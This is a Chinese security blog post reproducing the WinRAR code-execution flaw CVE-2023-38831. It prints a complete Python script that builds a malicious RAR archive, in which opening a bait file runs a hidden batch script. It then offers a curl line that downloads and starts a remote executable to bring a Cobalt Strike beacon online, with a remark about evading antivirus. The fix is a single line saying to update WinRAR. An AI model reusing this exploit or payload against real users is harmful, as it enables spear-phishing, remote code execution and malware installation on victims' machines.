【漏洞复现】WinRAR代码执行漏洞CVE-2023-38831复现【附exp】

025210

前言

图片[1]-【漏洞复现】WinRAR代码执行漏洞CVE-2023-38831复现【附exp】-安全小天地

WinRAR 在处理压缩包内同名的文件与文件夹时存在代码执行漏洞。攻击者构建由恶意文件与非恶意文件构成的特制压缩包文件,诱导受害者打开此文件中看似无害的文件(如JPG文件)后,将在受害者机器上执行任意代码。

漏洞复现

利用代码


#!/usr/bin/env python3
# -*- coding: utf-8 -*-

import shutil
import os
import sys

TEMPLATE_NAME = \"TEMPLATE\"
OUTPUT_NAME = \"CVE-2023-38831-poc.rar\"

BAIT_NAME = \"test.txt\"
SCRIPT_NAME = \"test.bat\"

def main():
    global BAIT_NAME, SCRIPT_NAME, OUTPUT_NAME  # 声明为全局变量

    # 处理命令行参数
    if len(sys.argv) > 3:
        BAIT_NAME = os.path.basename(sys.argv[1])
        SCRIPT_NAME = os.path.basename(sys.argv[2])
        OUTPUT_NAME = os.path.basename(sys.argv[3])
    elif len(sys.argv) == 2 and sys.argv[1] == \"poc\":
        pass
    else:
        print(\"\"\"用法:
              python cve-2023-38831-exp-gen.py poc
              python cve-2023-38831-exp-gen.py <BAIT_NAME> <SCRIPT_NAME> <OUTPUT_NAME>\"\"\")
        sys.exit()

    # 提取鱼叉文件名的扩展名
    BAIT_EXT = b\".\" + bytes(BAIT_NAME.split(\".\")[-1], \"utf-8\")

    print(\"鱼叉文件名:\", BAIT_NAME)
    print(\"脚本文件名:\", SCRIPT_NAME)
    print(\"输出文件名:\", OUTPUT_NAME)

    # 清理并创建必要的目录
    if os.path.exists(TEMPLATE_NAME):
        shutil.rmtree(TEMPLATE_NAME)
    os.mkdir(TEMPLATE_NAME)
    d = os.path.join(TEMPLATE_NAME, BAIT_NAME + \"A\")
    if not os.path.exists(d):
        os.mkdir(d)

    # 复制文件到模板目录
    shutil.copyfile(SCRIPT_NAME, os.path.join(d, BAIT_NAME + \"A.cmd\"))
    shutil.copyfile(BAIT_NAME, os.path.join(TEMPLATE_NAME, BAIT_NAME + \"B\"))

    # 创建模板目录的 zip 压缩文件
    shutil.make_archive(TEMPLATE_NAME, \'zip\', TEMPLATE_NAME)

    # 读取、修改并写回 zip 压缩文件
    with open(TEMPLATE_NAME + \".zip\", \"rb\") as f:
        content = f.read()
        content = content.replace(BAIT_EXT + b\"A\", BAIT_EXT + b\" \")
        content = content.replace(BAIT_EXT + b\"B\", BAIT_EXT + b\" \")

    os.remove(TEMPLATE_NAME + \".zip\")

    # 将修改后的内容保存为最终输出文件
    with open(OUTPUT_NAME, \"wb\") as f:
        f.write(content)

    print(\"成功生成漏洞利用代码。\")

if __name__ == \"__main__\":
    main()

这里我们只是测试谈一侧计算器即可

参考代码,需要生成俩个文件

BAIT_NAME = \"test.txt\"
SCRIPT_NAME = \"test.bat\"

新建一个空的test.txt,还有一个批处理文件test.bat

test.bat中写入需要运行的命令 这里写入calc

图片[2]-【漏洞复现】WinRAR代码执行漏洞CVE-2023-38831复现【附exp】-安全小天地

运行脚本:

python cve-2023-38831-exp-gen.py poc

即可生成恶意rar文件:CVE-2023-38831-poc.rar

图片[3]-【漏洞复现】WinRAR代码执行漏洞CVE-2023-38831复现【附exp】-安全小天地

需要上线cs的话,可以修改test.bat文件内容为:

curl http://xxxxxxx/a.exe -o a.exe & start a.exe & exit

做好免杀就可以上线啦

修复

更新至最新版winrar

参考链接:

https://mp.weixin.qq.com/s/y5UqG5NuUtSHa7-i9AXVyw

------本文已结束,感谢您的阅读------
THE END
技术教程
# 漏洞复现# CVE-2023-38831# WinRAR代码执行漏洞
喜欢就支持一下吧
点赞10 分享
C语言教程的头像,网络安全爱好者中心-神域博客网
漏洞复现 深信服下一代防火墙NGAF login远程命令执行漏洞,网络安全爱好者中心-神域博客网
漏洞复现 深信服下一代防火墙NGAF login远程命令执行漏洞
漏洞复现 深信服下一代防火墙NGAF login远程命令执行漏洞
5个月前 269
记一次常规安全监测发现的挂马暗链,网络安全爱好者中心-神域博客网
记一次常规安全监测发现的挂马暗链
记一次常规安全监测发现的挂马暗链
5个月前 236
漏洞复现 JeecgBoot 企业级低代码平台 qurestSql SQL注入漏洞,网络安全爱好者中心-神域博客网
漏洞复现 JeecgBoot 企业级低代码平台 qurestSql SQL注入漏洞
漏洞复现 JeecgBoot 企业级低代码平台 qurestSql SQL注入漏洞
5个月前 232
金蝶OA Apusic应用服务器(中间件) server_file 目录遍历漏洞,网络安全爱好者中心-神域博客网
金蝶OA Apusic应用服务器(中间件) server_file 目录遍历漏洞
金蝶OA Apusic应用服务器(中间件) server_file 目录遍历漏洞
5个月前 214
Chaitin/xray1.9.3最新社区高级版 包含722POC 附license,网络安全爱好者中心-神域博客网
Chaitin/xray1.9.3最新社区高级版 包含722POC 附license
Chaitin/xray1.9.3最新社区高级版 包含722POC 附license
5个月前 159
在VMware虚拟机中安装windowsserver2016步骤详解(附激活教程及激活码),网络安全爱好者中心-神域博客网
在VMware虚拟机中安装windowsserver2016步骤详解(附激活教程及激活码)
在VMware虚拟机中安装windowsserver2016步骤详解(附激活教程及激活...
5个月前 155
相关推荐
漏洞复现 深信服下一代防火墙NGAF login远程命令执行漏洞,网络安全爱好者中心-神域博客网
漏洞复现 深信服下一代防火墙NGAF login远程命令执行漏洞
漏洞复现 深信服下一代防火墙NGAF login远程命令执行漏洞
5个月前 269
【漏洞复现】WinRAR代码执行漏洞CVE-2023-38831复现【附exp】,网络安全爱好者中心-神域博客网
【漏洞复现】WinRAR代码执行漏洞CVE-2023-38831复现【附exp】
【漏洞复现】WinRAR代码执行漏洞CVE-2023-38831复现【附exp】
5个月前 252
记一次常规安全监测发现的挂马暗链,网络安全爱好者中心-神域博客网
记一次常规安全监测发现的挂马暗链
记一次常规安全监测发现的挂马暗链
5个月前 236
漏洞复现 JeecgBoot 企业级低代码平台 qurestSql SQL注入漏洞,网络安全爱好者中心-神域博客网
漏洞复现 JeecgBoot 企业级低代码平台 qurestSql SQL注入漏洞
漏洞复现 JeecgBoot 企业级低代码平台 qurestSql SQL注入漏洞
5个月前 232
金蝶OA Apusic应用服务器(中间件) server_file 目录遍历漏洞,网络安全爱好者中心-神域博客网
金蝶OA Apusic应用服务器(中间件) server_file 目录遍历漏洞
金蝶OA Apusic应用服务器(中间件) server_file 目录遍历漏洞
5个月前 214
[GYCTF2020]Blacklist -堆叠查询- buu刷题笔记,网络安全爱好者中心-神域博客网
[GYCTF2020]Blacklist -堆叠查询- buu刷题笔记
[GYCTF2020]Blacklist -堆叠查询- buu刷题笔记
5个月前 112
评论 抢沙发
头像
善语结善缘,恶语伤人心
提交
头像

昵称

取消
昵称

请填写用户信息:

  • 昵称(必填)
  • 邮箱(必填)
常用语
请选择评论常用语:
  • 1、谢谢博主分享!
  • 2、博主NB,666
  • 3、感谢楼主分享!
  • 4、感谢大佬分享!
  • 5、教程很好用,谢谢!
 夸夸
夸夸
还有吗!没看够!
表情
[aoman][baiyan][bishi][bizui][cahan][ciya][dabing][daku][deyi][doge][fadai][fanu][fendou][ganga][guzhang][haixiu][hanxiao][zuohengheng][zhuakuang][zhouma][zhemo][zhayanjian][zaijian][yun][youhengheng][yiwen][yinxian][xu][xieyanxiao][xiaoku][xiaojiujie][xia][wunai][wozuimei][weixiao][weiqu][tuosai][tu][touxiao][tiaopi][shui][se][saorao][qiudale][qinqin][qiaoda][piezui][penxue][nanguo][liulei][liuhan][lenghan][leiben][kun][kuaikule][ku][koubi][kelian][keai][jingya][jingxi][jingkong][jie][huaixiao][haqian][aini][OK][qiang][quantou][shengli][woshou][gouyin][baoquan][aixin][bangbangtang][xiaoyanger][xigua][hexie][pijiu][lanqiu][juhua][hecai][haobang][caidao][baojin][chi][dan][kulou][shuai][shouqiang][yangtuo][youling]
图片

    暂无评论内容